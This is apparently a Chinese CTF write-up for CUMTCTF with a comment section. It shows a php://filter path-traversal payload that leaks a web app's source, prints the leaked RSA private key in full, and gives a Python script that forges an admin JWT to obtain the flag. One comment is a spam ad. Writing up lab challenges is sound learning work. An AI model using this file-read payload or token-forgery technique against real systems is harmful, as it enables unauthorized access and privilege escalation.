    ๐Ÿ:CUMTCTF{J^^T_L1k*_em0ji}
  • ่ฟ™้ข˜ๆ€่ทฏๅช่ฆๆ˜ฏๆž„้€ admin ็š„JWT
<!--info.php-->๐Ÿ‘จโ€๐Ÿ’ป๐Ÿ’“๐Ÿˆšโ›ฐ๏ธ</br><!--something in the index.php --></br>

ๆญคๅค–,ๆ›ดๅ…ทJWTๅพ—ๅˆฐไธ‹ไธ€ๆญฅๆ็คบ

image-20200927003952901

ไฝฟ็”จpath=php://filter/convert.quoted-printable-encode/resource=/x/../proc/self/cwd/index.php ๅฏไปฅ็š„ๅคง่‡ด่ฏปๅ–ไปฃ็ 

"fe1w0/fba60b53-0016-41ef-8c12-615c02768b12_fe1w0_own_rsa_private_key.pem",=0A 'public'=3D>'fe1w0/fba60b53-0016-41ef-8c12-615c02768b12_fe1w0_own_rsa_public_key.pem'=0A);=0Aif(file_exists($arr['private']))=0A{=0A$privateKey =3D file_get_contents('fe1w0/fba60b53-0016-41ef-8c12-615c02768b12_fe1w0_own_rsa_private_key.pem');=0A}=0Aelse {=0A$privateKey =3D << "=E2=9B=8F=EF=B8=8F=F0=9F=A7=91=E2=80=8D=F0=9F=8E=93",=0A "aud" =3D> "=F0=9F=A6=8C=F0=9F=A5=9A",=0A 'admin' =3D> false,=0A "nbf" =3D> time(),=0A "hint" =3D> 'post path'=0A);=0A$jwt =3D JWT::encode($payload, $privateKey, 'RS256');=0Asetcookie("Authorization", $jwt, time()+3600);=0A$decoded =3D JWT::decode($jwt, $publicKey, array('RS256'));=0A$decoded_array =3D (array) $decoded;=0Aecho "";=0Aif(preg_match('/index.php/',$_SERVER['PHP_SELF']))=0A{=0A echo "=E4=BD=A0=E5=B7=B2=E7=BB=8F=E8=A2=AB=E9=99=84=E9=AD=94=E4=BA=86,=E5=BF=AB=E4=B8=8A=F0=9F=91=8D=F0=9F=91=8C=F0=9F=99=8C";=0A}=0A?>

ๅพ—ๅˆฐ็ง้’ฅๅœฐๅ€fe1w0/fba60b53-0016-41ef-8c12-615c02768b12_fe1w0_own_rsa_private_key.pem

-----BEGIN RSA PRIVATE KEY-----
MIICXQIBAAKBgQC1zdpFyJ3i3HN50FyDMjLZvw8/aTQsI1GgIPg8bmQQFuopdPw3
VtYjDf0ncUgQKPyeP7atudWVkMbRXNVpE+fSYpNah84Bk2QS51Wvu+pJu8x7/XTG
yc1EH6CRtwdaRC8mYDmcxx80L/VnJBWtw+Itvc4WaSG+Xd+SUpcTFRsI+wIDAQAB
AoGAHabqf9E9tx+fkfGi9R793jfkQ8Jj6QMFsClQc4LJvToPjR1weZInMOZ6MLGw
QDp/IUxg/iq+JDvNwZ3zjMTbXVWo8eul1JLK+h8wx4ZNIX8RYhHIxa6LBZC2R8+4
Hhj6D20shrxP9FBuTN3+QZm2WrzxAaCQ76s2aUy4qGULhckCQQDYHdeldSKs8XQQ
C3t62mtLKgSMJD16AJtNgymcfZJux1oM9waU0d2R9gpWR+AE8DWWqun2FDxnu2mt
qnw5VYENAkEA11r1/zZzECGZo8zPO1KAk2OF54LLw9f2EL9X0Vlh4HdtgIznv+as
nKRACHplZalFT+4cb+0AiGzPc6kMRI3gJwJAE8uv/Azdrz+ypOGYXulw2IKxxfBv
3SP/FbuE7TunVRRXkEZ0SN9sTzldOwf8YhdqoTFomszBt7K3/FtYY5wMZQJBAL+Q
iUyJadcKnHmpgRna7Mau+/kRTyKZ46fIHVz7LmaWtdBpBumcTyVTsiYYgkPpS9+r
Bp7FavjwGaVf1arRrXcCQQC2iwZQasQ4jl5r3e4h61ILcedud0pf+71gx+c/v3lq
eQl+1MjCZSAs/6z9RbeueqzL8Ja1TLxr8Vvl2yGZREMe
-----END RSA PRIVATE KEY-----

ๆž„้€ admin ๏ผŒ่Žทๅพ—flag

import jwt
import base64
import os
from flask import Flask, render_template, make_response, request, redirect

with open("rsa_private_key.pem", "r") as f:
    PUBLIC_KEY = f.read()

payload = {
    "iss" : "โ›๏ธ๐Ÿง‘โ€๐ŸŽ“",
    "aud" : "๐ŸฆŒ๐Ÿฅš",
    'admin' : 1,
    "nbf" : 1600441811,
    "note" : 'fe1w0'
}
auth = jwt.encode(payload, PUBLIC_KEY, algorithm="RS256")

print(auth)
# CUMTCTF{J^^T_L1k*_em0ji}

่ฏ„่ฎบ

  1. 4ๅ‘จๅ‰
    2020-10-03 19:19:04

    ่‹ฅๆœ‰็บฐๆผๆˆ–้”™่ฏฏ,้บป็ƒฆๆ–งๆญฃ@[็คผ็‰ฉ]

  2. yjf
    2ๅคฉๅ‰
    2020-10-28 13:24:21

    ๅฟซ้€’่‡ชๅŠฉไธ‹ๅ•็ฝ‘็ซ™ ็ฉบๅŒ…่‡ชๅŠฉๅ•ๅท็ฝ‘็ซ™www.5adanhao.cn

ๅ‘้€่ฏ„่ฎบ ็ผ–่พ‘่ฏ„่ฎบ


				
|ยดใƒปฯ‰ใƒป)ใƒŽ
ใƒพ(โ‰งโˆ‡โ‰ฆ*)ใ‚
(โ˜†ฯ‰โ˜†)
๏ผˆโ•ฏโ€ตโ–กโ€ฒ๏ผ‰โ•ฏ๏ธตโ”ดโ”€โ”ด
๏ฟฃ๏นƒ๏ฟฃ
(/ฯ‰๏ผผ)
โˆ ( แ› ใ€โˆ )๏ผฟ
(เน‘โ€ขฬ€ใ…โ€ขฬเธ…)
โ†’_โ†’
เญง(เน‘โ€ขฬ€โŒ„โ€ขฬเน‘)เซญ
ูฉ(หŠแ—œห‹*)ูˆ
(ใƒŽยฐฮฟยฐ)ใƒŽ
(ยดเฎ‡็šฟเฎ‡๏ฝ€)
โŒ‡โ—๏นโ—โŒ‡
(เธ…ยดฯ‰`เธ…)
(โ•ฏยฐAยฐ)โ•ฏ๏ธตโ—‹โ—‹โ—‹
ฯ†(๏ฟฃโˆ‡๏ฟฃo)
ใƒพ(ยด๏ฝฅ ๏ฝฅ๏ฝ€๏ฝก)ใƒŽ"
( เธ‡ แต’ฬŒ็šฟแต’ฬŒ)เธ‡โผยณโ‚Œโ‚ƒ
(รณ๏นรฒ๏ฝก)
ฮฃ(ใฃ ยฐะ” ยฐ;)ใฃ
( ,,ยด๏ฝฅฯ‰๏ฝฅ)๏พ‰"(ยดใฃฯ‰๏ฝฅ๏ฝ€๏ฝก)
โ•ฎ(โ•ฏโ–ฝโ•ฐ)โ•ญ
o(*////โ–ฝ////*)q
๏ผž๏น๏ผœ
( เน‘ยดโ€ขฯ‰โ€ข) "(ใ††แด—ใ††)
๐Ÿ˜‚
๐Ÿ˜€
๐Ÿ˜…
๐Ÿ˜Š
๐Ÿ™‚
๐Ÿ™ƒ
๐Ÿ˜Œ
๐Ÿ˜
๐Ÿ˜˜
๐Ÿ˜œ
๐Ÿ˜
๐Ÿ˜
๐Ÿ˜’
๐Ÿ™„
๐Ÿ˜ณ
๐Ÿ˜ก
๐Ÿ˜”
๐Ÿ˜ซ
๐Ÿ˜ฑ
๐Ÿ˜ญ
๐Ÿ’ฉ
๐Ÿ‘ป
๐Ÿ™Œ
๐Ÿ–•
๐Ÿ‘
๐Ÿ‘ซ
๐Ÿ‘ฌ
๐Ÿ‘ญ
๐ŸŒš
๐ŸŒ
๐Ÿ™ˆ
๐Ÿ’Š
๐Ÿ˜ถ
๐Ÿ™
๐Ÿฆ
๐Ÿ‰
๐Ÿ˜ฃ
Source: github.com/k4yt3x/flowerhd
้ขœๆ–‡ๅญ—
Emoji
ๅฐๆ้พ™
่Šฑ!
ไธŠไธ€็ฏ‡
ไธ‹ไธ€็ฏ‡